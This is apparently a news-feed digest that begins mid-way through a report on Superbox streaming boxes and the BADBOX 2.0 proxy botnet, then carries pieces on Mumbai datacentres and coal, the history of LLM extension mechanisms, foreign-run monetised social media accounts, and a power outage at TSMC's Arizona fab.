According to this teardown by behindmlm.com , a blog that covers multi-level marketing (MLM) schemes, Grass’s compensation plan is built around “grass points,” which are earned through the use of the Grass app and through app usage by recruited affiliates. Affiliates can earn 5,000 grass points for clocking 100 hours usage of Grass’s app, but they must progress through ten affiliate tiers or ranks before they can redeem their grass points (presumably for some type of cryptocurrency). The 10th or “Titan” tier requires affiliates to accumulate a whopping 50 million grass points, or recruit at least 221 more affiliates .

Radonjic said Grass’s system has changed in recent months, and confirmed the company has a referral program where users can earn Grass Uptime Points by contributing their own bandwidth and/or by inviting other users to participate.

“Users are not required to participate in the referral program to earn Grass Uptime Points or to receive Grass Tokens,” Radonjic said. “Grass is in the process of phasing out the referral program and has introduced an updated Grass Points model.”

A review of the Terms and Conditions page for getgrass[.]io at the Wayback Machine shows Grass’s parent company has changed names at least five times in the course of its two-year existence. Searching the Wayback Machine on getgrass[.]io shows that in June 2023 Grass was owned by a company called Wynd Network . By March 2024, the owner was listed as Lower Tribeca Corp. in the Bahamas. By August 2024, Grass was controlled by a Half Space Labs Limited , and in November 2024 the company was owned by Grass OpCo (BVI) Ltd . Currently, the Grass website says its parent is just Grass OpCo Ltd (no BVI in the name).

Radonjic acknowledged that Grass has undergone “a handful of corporate clean-ups over the last couple of years,” but described them as administrative changes that had no operational impact. “These reflect normal early-stage restructuring as the project moved from initial development…into the current structure under the Grass Foundation,” he said.

UNBOXING

Censys’s Ashley said the phone home to China’s Tencent QQ instant messaging service was the first red flag with the Superbox devices she examined. She also discovered the streaming boxes included powerful network analysis and remote access tools, such as Tcpdump and Netcat .

“This thing DNS hijacked my router, did ARP poisoning to the point where things fall off the network so they can assume that IP, and attempted to bypass controls,” she said. “I have root on all of them now, and they actually have a folder called ‘secondstage.’ These devices also have Netcat and Tcpdump on them, and yet they are supposed to be streaming devices.”

A quick online search shows various Superbox models and many similar Android streaming devices for sale at a wide range of top retail destinations, including Amazon , BestBuy , Newegg , and Walmart . Newegg.com, for example, currently lists more than three dozen Superbox models. In all cases, the products are sold by third-party merchants on these platforms, but in many instances the fulfillment comes from the e-commerce platform itself.

“Newegg is pretty bad now with these devices,” Ashley said. “Ebay is the funniest, because they have Superbox in Spanish — the SuperCaja — which is very popular.”

Superbox devices for sale via Newegg.com.

Ashley said Amazon recently cracked down on Android streaming devices branded as Superbox, but that those listings can still be found under the more generic title “ modem and router combo ” (which may be slightly closer to the truth about the device’s behavior).

Superbox doesn’t advertise its products in the conventional sense. Rather, it seems to rely on lesser-known influencers on places like Youtube and TikTok to promote the devices. Meanwhile, Ashley said, Superbox pays those influencers 50 percent of the value of each device they sell.

“It’s weird to me because influencer marketing usually caps compensation at 15 percent, and it means they don’t care about the money,” she said. “This is about building their network.”

A TikTok influencer casually mentions and promotes Superbox while chatting with her followers over a glass of wine.

BADBOX

As plentiful as the Superbox is on e-commerce sites, it is just one brand in an ocean of no-name Android-based TV boxes available to consumers. While these devices generally do provide buyers with “free” streaming content, they also tend to include factory-installed malware or require the installation of third-party apps that engage the user’s Internet address in advertising fraud.

In July 2025, Google filed a “John Doe” lawsuit (PDF) against 25 unidentified defendants dubbed the “ BadBox 2.0 Enterprise ,” which Google described as a botnet of over ten million Android streaming devices that engaged in advertising fraud. Google said the BADBOX 2.0 botnet, in addition to compromising multiple types of devices prior to purchase, can also infect devices by requiring the download of malicious apps from unofficial marketplaces.

Some of the unofficial Android devices flagged by Google as part of the Badbox 2.0 botnet are still widely for sale at major e-commerce vendors. Image: Google.

Several of the Android streaming devices flagged in Google’s lawsuit are still for sale on top U.S. retail sites. For example, searching for the “ X88Pro 10 ” and the “ T95 ” Android streaming boxes finds both continue to be peddled by Amazon sellers.

Google’s lawsuit came on the heels of a June 2025 advisory from the Federal Bureau of Investigation (FBI), which warned that cyber criminals were gaining unauthorized access to home networks by either configuring the products with malicious software prior to the user’s purchase, or infecting the device as it downloads required applications that contain backdoors, usually during the set-up process.

“Once these compromised IoT devices are connected to home networks, the infected devices are susceptible to becoming part of the BADBOX 2.0 botnet and residential proxy services known to be used for malicious activity,” the FBI said.

The FBI said BADBOX 2.0 was discovered after the original BADBOX campaign was disrupted in 2024. The original BADBOX was identified in 2023, and primarily consisted of Android operating system devices that were compromised with backdoor malware prior to purchase.

Riley Kilmer is founder of Spur , a company that tracks residential proxy networks. Kilmer said Badbox 2.0 was used as a distribution platform for IPidea , a China-based entity that is now the world’s largest residential proxy network.

Kilmer and others say IPidea is merely a rebrand of 911S5 Proxy , a China-based proxy provider sanctioned last year by the U.S. Department of the Treasury for operating a botnet that helped criminals steal billions of dollars from financial institutions, credit card issuers, and federal lending programs (the U.S. Department of Justice also arrested the alleged owner of 911S5).

How are most IPidea customers using the proxy service? According to the proxy detection service Synthient , six of the top ten destinations for IPidea proxies involved traffic that has been linked to either ad fraud or credential stuffing (account takeover attempts).

Kilmer said companies like Grass are probably being truthful when they say that some of their customers are companies performing web scraping to train artificial intelligence efforts , because a great deal of content scraping which ultimately benefits AI companies is now leveraging these proxy networks to further obfuscate their aggressive data-slurping activity. By routing this unwelcome traffic through residential IP addresses, Kilmer said, content scraping firms can make it far trickier to filter out.

“Web crawling and scraping has always been a thing, but AI made it like a commodity, data that had to be collected,” Kilmer told KrebsOnSecurity. “Everybody wanted to monetize their own data pots, and how they monetize that is different across the board.”

SOME FRIENDLY ADVICE

Products like Superbox are drawing increased interest from consumers as more popular network television shows and sportscasts migrate to subscription streaming services, and as people begin to realize they’re spending as much or more on streaming services than they previously paid for cable or satellite TV.

These streaming devices from no-name technology vendors are another example of the maxim, “If something is free, you are the product,” meaning the company is making money by selling access to and/or information about its users and their data.

Superbox owners might counter, “Free? I paid $400 for that device!” But remember: Just because you paid a lot for something doesn’t mean you are done paying for it, or that somehow you are the only one who might be worse off from the transaction.

It may be that many Superbox customers don’t care if someone uses their Internet connection to tunnel traffic for ad fraud and account takeovers; for them, it beats paying for multiple streaming services each month. My guess, however, is that quite a few people who buy (or are gifted) these products have little understanding of the bargain they’re making when they plug them into an Internet router.

Superbox performs some serious linguistic gymnastics to claim its products don’t violate copyright laws, and that its customers alone are responsible for understanding and observing any local laws on the matter. However, buyer beware: If you’re a resident of the United States, you should know that using these devices for unauthorized streaming violates the Digital Millennium Copyright Act (DMCA), and can incur legal action, fines, and potential warnings and/or suspension of service by your Internet service provider.

According to the FBI, there are several signs to look for that may indicate a streaming device you own is malicious, including:

-The presence of suspicious marketplaces where apps are downloaded.
-Requiring Google Play Protect settings to be disabled.
-Generic TV streaming devices advertised as unlocked or capable of accessing free content.
-IoT devices advertised from unrecognizable brands.
-Android devices that are not Play Protect certified.
-Unexplained or suspicious Internet traffic.

This explainer from the Electronic Frontier Foundation delves a bit deeper into each of the potential symptoms listed above.

Launch HN: Karumi (YC F25) – Personalized, agentic product demos

Hacker News
www.karumi.ai
2025-11-24 18:37:27
Comments...
Original Article

If you have any problems, let us know at support@karumi.ai

Launch HN: Karumi (YC F25) – Personalized, agentic product demos

Hacker News
karumi.ai
2025-11-24 18:37:27
Comments...
Original Article

What a Karumi Agent can do for you

Hyper-personalization at Scale

"Demos are just the start. Agentic experiences redefine every step of GTM. Scalable personalization is here!"

Alex Lindahl

GTM Engineer @ Clay

"Faster 'Aha!' moments at scale with personalized demos, without headcount increase."

Bernard Aceituno

CEO @ StackAI

"We capture more leads and strengthen our funnel by scaling up demos right when prospects need them."

Max Minsker

CEO @ Cranston

‘It’s hell for us here’: Mumbai families suffer as datacentres keep the city hooked on coal

Guardian
www.theguardian.com
2025-11-24 18:35:24
As Mumbai sees increased energy demand from new datacenters, particularly from Amazon, the filthiest neighbourhood in one of India’s largest cities must keep its major coal plants Each day, Kiran Kasbe drives a rickshaw taxi through his home neighbourhood of Mahul on Mumbai’s eastern seafront, down ...
Original Article

E ach day, Kiran Kasbe drives a rickshaw taxi through his home neighbourhood of Mahul on Mumbai’s eastern seafront, down streets lined with stalls selling tomatoes, bottle gourds and aubergines–and, frequently, through thick smog.

Earlier this year, doctors found three tumours in his 54-year-old mother’s brain. It’s not clear exactly what caused her cancer. But people who live near coal plants are much more likely to develop the illness, studies show , and the residents of Mahul live a few hundred metres down the road from one.

Mahul’s air is famously dirty. Even behind closed car windows, there is a heavy stench of oil and smoke.

“We are not the only ones facing health challenges in the area,” said Kasbe, who is 36. “It’s all covered with filth.”

Two coal plants plant run by the Indian multinationals Tata Group and Adani were due to close last year in a government push to cut emissions. But late in 2023, those decisions were reversed after Tata argued that electricity demand was rising too fast for Mumbai to go without coal.

Neither company responded to requests for comment.

Buildings shrouded in smog in Mumbai, India, in January 2025.
Buildings shrouded in smog in Mumbai, India, in January. Photograph: Bloomberg/Getty Images

Economic growth and the need for air conditioning in climate change-linked extreme heat have seen India’s electricity demand soar in recent years. But an investigation by SourceMaterial and the Guardian reveals the biggest single factor in the city’s failure to end its dependence on fossil fuels: energy-hungry datacentres.

Leaked records also reveal the scale of the presence of the world’s biggest datacentre operator, Amazon, in Mumbai.

In the city’s metropolitan area, Amazon, on its website, records three “availability zones”, which it defines as one or more datacentres. Leaked records from last year seen by SourceMaterial from inside Amazon reveal the company used 16 in the city.

As India transforms its economy into a hub for artificial intelligence, the datacentre boom is creating a conflict between energy demand and climate pledges, said Bhaskar Chakravorti, who researches technology’s impact on society at Tufts University.

“I’m not surprised they’re falling behind their green transition commitments, especially with the demand growing exponentially,” he said of the Indian government.

Kylee Yonas, a spokeswoman for Amazon, said Mumbai’s “emission challenges” were not caused by Amazon.

“On the contrary – Amazon is one of the largest corporate investors in renewable energy in India, and we’ve supported 53 solar and wind projects in the country capable of generating over 4m megawatt hours of clean energy annually,” she said. “These investments, which include our 99 megawatt wind project in Maharashtra, are enough to power over 1.3m Indian homes annually once operational.”

Amazon is building hundreds of datacentres around the world as it vies with Microsoft, Google and others for leadership of the booming AI market.

the door of a brown building
Tata Consultancy Services Ltd office in Mumbai, India. Photograph: Bloomberg/Getty Images

The company is failing to take responsibility for its role in prolonging the use of the most polluting energy sources, said Eliza Pan, a spokeswoman for Amazon Employees for Climate Justice.

“Amazon is using the shiny thing of AI to distract from the fact that it’s building a dirty energy empire,” she said.

Yonas denied this, saying: “Not only are we the leading datacentre operator in efficiency, we’re the world’s largest corporate purchaser of renewable energy for five consecutive years with over 600 projects globally.”

Amazon’s claims on green energy are controversial: the company has been criticised for using “ creative accounting ” by buying renewable energy certificates alongside direct purchases of green energy, as described by a member of Amazon Employees for Climate Justice.

‘Everything is contaminated’

Mahul, where Kasbe drives his rickshaw, is a former fishing village now home to tens of thousands of people who moved there after slum clearances elsewhere in the city.

a woman
Kiran Kasbe’s mother. Photograph: Courtesy Sushmita

Kasbe and his mother arrived there in 2018 after their home in the suburb of Vidyavihar was bulldozed. She had been healthy before the move but deteriorated rapidly until eventually she was diagnosed with brain cancer, he said.

Gajanan Tandle, who lives nearby, said pollution-linked illnesses were common. “There are so many cases of skin and eye irritation, cancer, asthma, TB and more, and no assistance from the government,” he said.

Another local, Santosh Jadhav, has lobbied the government to move people away from Mahul.

“Everything is contaminated. We are tired of fighting for a decent means of living,” he said. “It’s hell for us here.”

skip past newsletter promotion

Amazon, an online marketplace that processes 13 million customer purchases each day, according to research by CapitalOne, has bet billions of dollars on an expansion of its lucrative cloud computing business and expansion of AI-assisted services, from automated coding to translation.

The reason so many of its Mumbai centres have slipped under the radar is that they are leased rather than owned by the company. Whereas in the US Amazon tends to own its facilities outright, elsewhere it often rents either entire data farms or server racks in centres shared with other companies.

Shared “colocation” units account for a larger increase in datacentre energy use worldwide than owned or wholly leased, according to Shaolei Ren, a computing specialist at the University of California, Riverside.

“Most of the energy in the datacentre industry is going into colocations,” he said. “They are everywhere.”

Workers near Amazon Prime branding in Mumbai, India, on September.
Workers near Amazon Prime branding in Mumbai, India, on September. Photograph: NurPhoto/Getty Images

Amazon’s Mumbai colocation datacentres used 624,518 megawatt hours of electricity in 2023, enough to power over 400,000 Indian households for a year, the leaked data shows.

India is poised to overtake Japan and Australia to become the second-largest user of datacentre electricity in the Asia-Pacific region, S&P has forecast. By 2030, datacentres will consume a third of Mumbai’s energy, according to Ankit Saraiya, chief executive of Techno & Electric Engineering, an Indian power infrastructure supplier.

‘Toxic hell’

As it scrambles to keep ahead of demand for power, the state government of Maharashtra has extended the life of Tata’s coal plant in Mahul by at least five years. At the same time, it also postponed the shutdown of a 500-megawatt station operated by Tata’s rival, Adani Group, north of the city.

When Tata argued for the extension in a petition to the state energy board, the biggest single factor the company cited was increased energy demand from datacentres. Adani said most anticipated new demand in the five years after the date by which its station was due to close would be from datacentres.

The power stations are just two of many polluters in Mumbai’s Mahul district. The area is also home to three refineries and 16 chemical factories, according to a 2019 report published by India’s Centre for Policy Studies which called the neighbourhood a “toxic hell”.

But the Tata station, opened in 1984 and like other older power stations subject to laxer emissions rules , is “one of the key sources of air pollution in Mumbai”, according to Raj Lal, chief air quality scientist at the World Emission Network.

It contributes nearly a third of local PM2.5 pollution, according to the Centre for Research on Energy and Clean Air. PM2.5 refers to airborne particles 2.5 micrometers or less in diameter that can cause significant health problems when inhaled.

Smoke rises from a chimney at the Tata Power Co Trombay Thermal power station in Mumbai, India, in August 2017.
Smoke rises from a chimney at the Tata Power Co Trombay Thermal power plant in Mumbai, India, in August 2017. Photograph: Bloomberg/Getty Images

Toxic heavy metals in coal ash from the plant are likely to cause “respiratory diseases, kidney issues, skin problems, cardiac issues”, said Shripad Dharmadhikary, founder of the environmental organisation Manthan Adhyayan Kendra.

Even with the Tata plant kept running, Mumbai’s power grid is creaking under the strain of surging demand. To guard against blackouts, Amazon’s colocation datacentres in the city have bought 41 diesel generators as backup and are asking for approval to install more, documents show.

In August a report by the Center for Study of Science, Technology and Policy (CSTEP) identified diesel generators as a major source of air pollution in the region.

The presence of datacentres that require constant power and diesel generators for backup “will naturally exacerbate emissions”, said Swagata Dey, air quality specialist at (CSTEP), asserting that datacentre operators should be required by law to power them with pollution-free solar electricity.

One Amazon site in particular, just across the Thane Creek from Mahul, hosts 14 generators. One of the company’s partners received permission earlier this year to install 12 further generators at the site.

“Public health impacts must be a central consideration when siting datacenters and choosing energy sources,” said Ren of the University of California, Riverside, who co-wrote a recent paper assessing public health risk from diesel generators at US datacentres.

Sushmita does not use a surname because in India a surname indicates the caste–a hierarchical and discriminatory social structure.

The Bitter Lesson of LLM Extensions

Hacker News
www.sawyerhood.com
2025-11-24 18:32:27
Comments...
Original Article

Three years ago, “using an LLM” meant pasting a wall of text into a chat box and hoping for something useful back. Today, we point agents at our codebases, our browsers, and let them go off and act on our behalf. A key question that has been brewing under the surface during this time has been: how do we let end users actually customize these systems ?

As models have become more capable, the ways and mechanisms that end users have access to customize them have expanded as well. We've gone from simple system prompts to complex client-server protocols and back again.

I wanted to take a moment to reflect on the history of LLM extension over the last three years and where I see it going in the future.

ChatGPT Plugins ( March 2023 )

Just four months after launch, OpenAI announced ChatGPT Plugins . Looking back, these were wildly ahead of their time.

The idea was ambitious: give the LLM a link to an OpenAPI spec and let it "run wild" calling REST endpoints. It was a direct line to AGI-style thinking: universal tool use via standard APIs.

{
  "schema_version": "v1",
  "name_for_human": "TODO Manager",
  "name_for_model": "todo_manager",
  "description_for_human": "Manages your TODOs!",
  "description_for_model": "An app for managing a user's TODOs",
  "api": { "url": "/openapi.json" },
  "auth": { "type": "none" },
  "logo_url": "https://example.com/logo.png",
  "legal_info_url": "http://example.com",
  "contact_email": "hello@example.com"
}

The problem? The models weren't ready. GPT-3.5 (and even early GPT-4) struggled to navigate massive API specs without hallucinating or getting lost in context. Plus, the UX was clunky. You had to manually toggle plugins for every chat!

Here's what that looked like:

But it gave us a glimpse of the future: The Code Interpreter plugin (later Advanced Data Analysis) became indispensable, foreshadowing the powerful sandboxed execution environments we use today.

Custom Instructions ( July 2023 )

Custom instructions were the "smooth brain" counter-reaction to the complexity of plugins. I did a double take when writing this because I thought for sure this feature was released before plugins.

It was just a user-defined prompt appended to every chat. Simple. Obvious. Yet it solved a huge problem: repetitive context setting.

This was the spiritual ancestor to every .cursorrules and CLAUDE.md file that followed.

Custom GPTs ( Nov 2023 )

OpenAI repackaged instructions and tools into Custom GPTs . This was an attempt to "productize" prompt engineering. You could bundle a persona, some files, and a few actions into a shareable link.

It was a retreat from the open-ended promise of plugins toward curated, single-purpose "apps."

Memory in ChatGPT ( February 2024 )

So far, we've discussed manual ways to extend LLMs. Memory represented a shift toward automatic personalization.

ChatGPT Memory records details from your conversations and quietly inserts them into future context. It's like a system prompt that writes itself. If you mention you're a vegetarian, it remembers that weeks later. It’s a small feature, but it marked the beginning of agents that maintain long-term state without user intervention.

Cursor Rules ( April 2024 )

Cursor changed the game by putting custom instructions where they belonged: in the repo .

The .cursorrules file was a revelation. Instead of pasting context into a chat window, you committed it to git.

  • "We use tabs, not spaces."
  • "No semicolons."
  • "Always use TypeScript."

It started as a single file, then evolved into a .cursor/rules folder with sophisticated scoping. You could organize multiple rule files, and even define when they applied, for example, only for certain file types or subdirectories. It was the first time extension felt "native" to the code.

Later Cursor introduced the ability to let the LLM decide when to apply a rule, which is a pattern we will see again.

Model Context Protocol ( Nov 2024 )

By late 2024, models were finally smart enough to handle real tools reliably. Anthropic's Model Context Protocol (MCP) was the answer.

MCP is a heavyweight solution. An MCP client needs to keep a persistent connection to an MCP server. The server serves up tool definitions, resources, and prompts to the client (in most cases is an agent) and it can send a message to the server saying a tool has been called and the server can respond with the result.

Unlike Custom Instructions (which just add context), MCP gives the model actual capabilities . It can read your repo, query your Postgres DB, or deploy to Vercel. Besides just providing tools, it also allows servers to provide resources (documents, logs) and prompts directly to the agent.

It's powerful, and perhaps a bit of overkill. While the complexity might be worth it for agent developers asking a user to set up and connect an MCP is a lot of friction and there is an entire ecosystem of startups like Smithery built around making it easier to use MCP.

It is worth noting that ChatGPT apps which were announced in October 2025 are built on top of MCP as a base layer. This is an attempt to make it easier for end users to use MCP without having to actually think about it.

Claude Code: New Agent, New Extensions (Feb 2025)

Early 2025 brought us Claude Code , which essentially added every extension mechanism under the sun to an agent.

  • CLAUDE.md : The standard for repo-level instructions.
  • MCP: For heavy-duty tool integration.
  • Slash Commands: Like Cursor's notebooks, for reusable prompts.
  • Hooks: The ability to intercept and modify the agent's loop (e.g., "Stop if the tests fail").
  • Sub-agents: Spawning specialized workers to handle sub-tasks.
  • Output Styles: (Deprecated) Configuring tone and format.

Time will tell how many of these features will stick around in the long term. Anthropic has already tried to deprecate output styles .

Agent Skills ( Oct 2025 )

The next extension mechanism added to Claude Code is significant enough to warrant a deeper dive. Agent Skills are the rebirth of ChatGPT Plugins.

While MCP has a whole client-server protocol, Agent Skills are just folders of markdown files and scripts (in whatever language you choose).

The agent simply scans a skills/ directory, reads the frontmatter of every SKILL.md , and builds a lightweight index. It then chooses to read the full contents of a skill only if it's appropriate for the current task. This solves one of the major problems with MCP: the context bloat that comes from having to load all of the tool definitions into the context window at once.

Here is a snippet of the structure of a skill for doing e2e testing with Playwright taken from Anthropic's Skills examples repository:

webapp-testing/
├── examples/
│   ├── console_logging.py
│   ├── element_discovery.py
│   └── static_html_automation.py
├── scripts/
│   └── with_server.py
└── SKILL.md

There is a mix of scripts, examples, and plain text instructions. The only required file is the SKILL.md file. Let's take a look at that file:

---
name: webapp-testing
description: Toolkit for interacting with and testing local web applications using Playwright. Supports verifying frontend functionality, debugging UI behavior, capturing browser screenshots, and viewing browser logs.
license: Complete terms in LICENSE.txt
---

# Web Application Testing

To test local web applications, write native Python Playwright scripts.

**Helper Scripts Available**:

- `scripts/with_server.py` - Manages server lifecycle (supports multiple servers)

**Always run scripts with `--help` first** to see usage. DO NOT read the source until you try running the script first and find that a customized solution is absolutely necessary. These scripts can be very large and thus pollute your context window. They exist to be called directly as black-box scripts rather than ingested into your context window.

... skill continues ...

This is just a plain markdown file with some metadata and a description of the skill. The agent reads the file which freely references other files that the agent can read. In contrast a playwright MCP server has dozens of tool definitions to control a browser, this skill just says "you have bash, this is how you write a playwright script".

Granted to use a skill the agent needs to have general purpose access to a computer, but this is the bitter lesson in action. Giving an agent general purpose tools and trusting it to have the ability to use them to accomplish a task might very well be the winning strategy over making specialized tools for every task.

What the future holds

Skills are the actualization of the dream that was set out by ChatGPT Plugins: just give the model instructions and some generic tools and trust it to do the glue work in-between. But I have a hypothesis that it might actually work now because the models are actually smart enough for it to work.

Agent skills work because it assumes the agent has the ability to write its own tools (via bash commands). You can just give it code snippets and ask the agent to figure out how to run them generically for the task at hand.

Importantly, I think that skills signal towards a new definition of what an agent really is. An agent isn't just a LLM in a while loop. It's an LLM in a while loop that has a computer strapped to it.

Claude Code is the piece of software that first made this click for me, but it is way too developer focused to be the final form. Other applications like Zo Computer try to package the llm and computer together into a single application, but I still think it still doesn't abstract the computer away enough from the end user. If I ask a coworker to do something, I don't need to see their entire file system, I just need to know that they have a computer.

Looking forward into 2026 I expect more and more llm applications that we use will have a computer strapped to them in new and interesting ways, whether we know it or not.

If I could short MCP, I would, and I expect us to go back to extending our agents with the most accessible programming language: natural language.

America’s Polarization Has Become the World's Side Hustle

403 Media
www.404media.co
2025-11-24 18:31:57
The 'psyops' revealed by X are entirely the fault of the perverse incentives created by social media monetization programs....
Original Article

A new feature on X is making people suddenly realize that some large portion of the divisive, hateful, and spammy content designed to inflame tensions or, at the very least, is designed to get lots of engagement on social media, is being published by accounts that are pretending to be based in the United States but are actually being run by people in countries like Bangladesh, Vietnam, India, Cambodia, Russia, and other countries. An account called “Ivanka News” is based in Nigeria, “RedPilledNurse” is from Europe, “MAGA Nadine” is in Morocco, “Native American Soul” is in Bangladesh, and “Barron Trump News” is based in Macedonia, among many, many of others.

Inauthentic viral accounts on X are just the tip of the iceberg, though, as we have reported . A huge amount of the viral content about American politics and American news on social media is from sock puppet and bot accounts monetized by people in other countries. The rise of easy to use, free AI generative tools have supercharged this effort, and social media monetization programs have incentivized this effort and are almost entirely to blame. The current disinformation and slop phenomenon on the internet today makes the days of ‘Russian bot farms’ and ‘fake news pages from Cyprus’ seem quaint; the problem is now fully decentralized and distributed across the world and is almost entirely funded by social media companies themselves.

This will not be news to people who have been following 404 Media, because I have done multiple investigations about the perverse incentives that social media and AI companies have created to incentivize people to fill their platforms with slop. But what has happened on X is the same thing that has happened on Facebook, Instagram, YouTube, and other social media platforms (it is also happening to the internet as a whole, with AI slop websites laden with plagiarized content and SEO spam and monetized with Google ads). Each social media platform has either an ad revenue sharing program, a “creator bonus” program, or a monetization program that directly pays creators who go viral on their platforms .

This has created an ecosystem of side hustlers trying to gain access to these programs and YouTube and Instagram creators teaching people how to gain access to them. It is possible to find these guide videos easily if you search for things like “monetized X account” on YouTube. Translating that phrase and searching in other languages (such as Hindi, Portuguese, Vietnamese, etc) will bring up guides in those languages. Within seconds, I was able to find a handful of YouTubers explaining in Hindi how to create monetized X accounts; other videos on the creators’ pages explain how to fill these accounts with AI-generated content. These guides also exist in English, and it is increasingly popular to sell guides to make “AI influencers,” and AI newsletters, Reels accounts, and TikTok accounts regardless of the country that you’re from.

Examples include “AK Educate” (which is one of thousands), which posts every few days about how to monetize accounts on Facebook, YouTube, X, Instagram, TikTok, Etsy, and others. “How to create Twitter X Account for Monitization [sic] | Earn From Twitter in Pakistan,” is the name of a typical video in this genre. These channels are not just teaching people how to make and spam content, however. They are teaching people specifically how to make it seem like they are located in the United States, and how to create content that they believe will perform with American audiences on American social media. Sometimes they are advising the use of VPNs and other tactics to make it seem like the account is posting from the United States, but many of the accounts explain that doing this step doesn’t actually matter.

Americans are being targeted because advertisers pay higher ad rates to reach American internet users, who are among the wealthiest in the world. In turn, social media companies pay more money if the people engaging with the content are American. This has created a system where it makes financial sense for people from the entire world to specifically target Americans with highly engaging, divisive content. It pays more.

For the most part, the only ‘psyop’ here is one being run on social media users by social media companies themselves in search of getting more ad revenue by any means necessary.

For example: AK Educate has a video called “ 7 USA Faceless Channel Ideas for 2025 ,” and another video called “ USA YouTube Channel Kaise Banaye [how to] .” The first of these videos is in Hindi but has English subtitles.

“Where you get $1 on 1,000 views on Pakistani content,” the video begins, “you get $5 to $7 on 1,000 views on USA content.”

“As cricket is seen in Pakistan and India, boxing and MMA are widely seen in America,” he says. Channel ideas include “MMA,” “Who Died Today USA,” “How ships sink,” news from wars, motivational videos, and Reddit story voiceovers. To show you how pervasive this advice to make channels that target Americans is, look at this, which is a YouTube search for “USA Channel Kaise Banaye”:

0:00

/ 0:23

Screengrabs from YouTube videos about how to target Americans

One of these videos, called “ 7 Secret USA-Based Faceless Channel Ideas for 2026 (High RPM Niches!) ” starts with an explanation of “USA currency,” which details what a dollar is and what a cent is, and its value relative to the rupee, and goes on to explain how to generate English-language content about ancient history, rare cars, and tech news. Another video I watched showed, from scratch, how to create videos for a channel called “ Voices of Auntie Mae ,” which are supposed to be inspirational videos about Black history that are generated using a mix of ChatGPT, Google Translate, an AI voice tool called Speechma, Google’s AI image generator, CapCut, and YouTube. Another shows how to use Bing search, Google News Trends, Perplexity, and video generators to create “ a USA Global News Channel Covering World Events ,” which included making videos about the war in Ukraine and Chinese military parades. A video podcast about success stories included how a man made a baseball video called “baseball Tag of the year??? #mlb” in which 49 percent of viewers were in the USA: “People from the USA watch those types of videos, so my brother sitting at home in India easily takes his audience to an American audience,” one of the creators said in the video.

I watched video after video being created by a channel called “ Life in Rural Cambodia ,” about how to create and spam AI-generated content using only your phone. Another video, presented by an AI-generated woman speaking Hindi , explains how it is possible to copy paste text from CNN to a Google Doc, run it through a program called “GravityWrite” to alter it slightly, have an AI voice read it, and post the resulting video to YouTube.

A huge and growing amount of the content that we see on the internet is created explicitly because these monetization programs exist. People are making content specifically for Americans. They are not always, or even usually, creating it because they are trying to inflame tensions. They are making it because they can make money from it, and because content viewed by Americans pays the most and performs the best. The guides to making this sort of thing focus entirely on how to make content quickly, easily, and using automated tools. They focus on how to steal content from news outlets, source things from other websites, and generate scripts using AI tools. They do not focus on spreading disinformation or fucking up America, they focus on “making money.”  This is a problem that AI has drastically exacerbated, but it is a problem that has wholly been created by social media platforms themselves, and which they seem to have little or no interest in solving.

The new feature on X that exposes this fact is notable because people are actually talking about it, but Facebook and YouTube have had similar features for years, and it has changed nothing. Clicking any random horrific Facebook slop page, such as this one called “ City USA ” which exclusively posts photos of celebrities holding birthday cakes, shows that even though it lists its address as being in New York City, the page is being run by someone in Cambodia. This page called “ Military Aviation ” which lists its address as “Washington DC,” is actually based in Indonesia. This page called “ Modern Guardian ” and which exclusively posts positive, fake AI content about Elon Musk, lists itself as being in Los Angeles but Facebook’s transparency tools say it is based in Cambodia.

Besides journalists and people who feel like they are going crazy looking at this stuff, there are, realistically, no social media users who are going into the “transparency” pages of viral social media accounts to learn where they are based. The problem is not a lack of transparency, because being “transparent” doesn’t actually matter. The only thing revealed by this transparency is that social media companies do not give a fuck about this.

About the author

Jason is a cofounder of 404 Media. He was previously the editor-in-chief of Motherboard. He loves the Freedom of Information Act and surfing.

Jason Koebler

TSMC Arizona Outage Saw Fab Halt, Apple Wafers Scrapped

Hacker News
www.culpium.com
2025-11-24 18:30:48
Comments...
Original Article

Good Evening from Taipei,

A power outage at an industrial gas facility servicing TSMC interrupted manufacturing at the company’s Fab 21 in Arizona late last quarter, sources told me. The incident stopped the flow of crucial inputs needed for chipmaking, forcing the facility to shut down for at least a few hours, I was told. As a result, the company had to scrap thousands of wafers that were in production for clients at the site which include Apple, Nvidia, and AMD.

The event happened mid-September and was caused by a power fault at its outsourced vendor Linde , a British industrial gases and engineering company, my sources tell me. TSMC runs a lot of its own gas supply in Taiwan, but opted to contract the work out for its Arizona site. While mistakes happen, and insurance may cover some of the losses from the event, Linde has been put on notice to identify and rectify the cause of the outage, I was told. A PR representative for Linde didn’t answer multiple phone calls and emails from Culpium outlining the incident and requesting comment.

Photo: Culpium & Adobe Stock

TSMC’s Arizona unit turned profitable in the first quarter of this year, a sign of the Taiwanese company’s ability to quickly scale up and churn out chips even in higher-cost locales like the US. But a 99% drop in net income in the third quarter to just $1.4 million had folks scratching their head. One writer was quick to jump to conclusions, with the assumption that “rising costs have taken out an enormous chunk of profits, putting pressure on the firm’s operations.” The September outage, which hasn’t previously been reported, offers an alternative explanation for the profit decline.

“TSMC Arizona has begun to positively contribute to TSMC’s revenue. However, the company’s profit is influenced by multiple factors and should be read over time,” TSMC wrote in response to a detailed account of what Culpium has been told about the outage. “We also stated before that the ramp up for our overseas fabs will lead to gross margin dilution in the next five years, starting from 2025.”

Unfortunately, the company declined to immediately address the issue of the manufacturing disruption.

Fab shutdowns are unusual, at least for TSMC. With equipment so expensive, its factories are run 24/7. That means that an hour of idle time can cost millions of dollars. Compounding the financial effect of this incident was the fact that it occurred late in the quarter, leaving little room to make up for lost production before the quarter closed.

Profit margins on new facilities and at new nodes tend to be quite thin, even negative. In addition, TSMC has been ramping up capacity in Arizona and that capex gets reflected in depreciation costs even before the new equipment can start producing revenue. So it’s reasonable to see fluctuations in net income at the site. A halt in production and scrapping of wafers adds to the costs, dragging on earnings even if only slightly and briefly.

Impact to clients is likely to be negligible, I was told, and the financial loss to TSMC may be covered by insurance. Capacity at Fab 21 is still quite small, and many products being made there have already been taped out and manufactured in Taiwan previously. In past disruptions, lost production and revenue was made up in the subsequent quarter.

That said, the broader issue is that Taiwanese manufacturers are good at managing their operations when they handle it themselves, but still face struggles when they need to lean on non-Taiwanese firms at overseas facilities. The entire process of building the fab and installing equipment at Arizona has been an exercise in cross-cultural adaptation .

The most common cause of production interruptions at TSMC is Mother Nature. Earthquakes regularly rattle Taiwan, and fabs are built to withstand most of them. But sometimes a big tremor can trigger a safety shutdown, while really nasty temblors have caused actual damage. Beyond natural disasters, there’ve been few man-made shutdowns at TSMC because they’re pretty rigorous about operations.

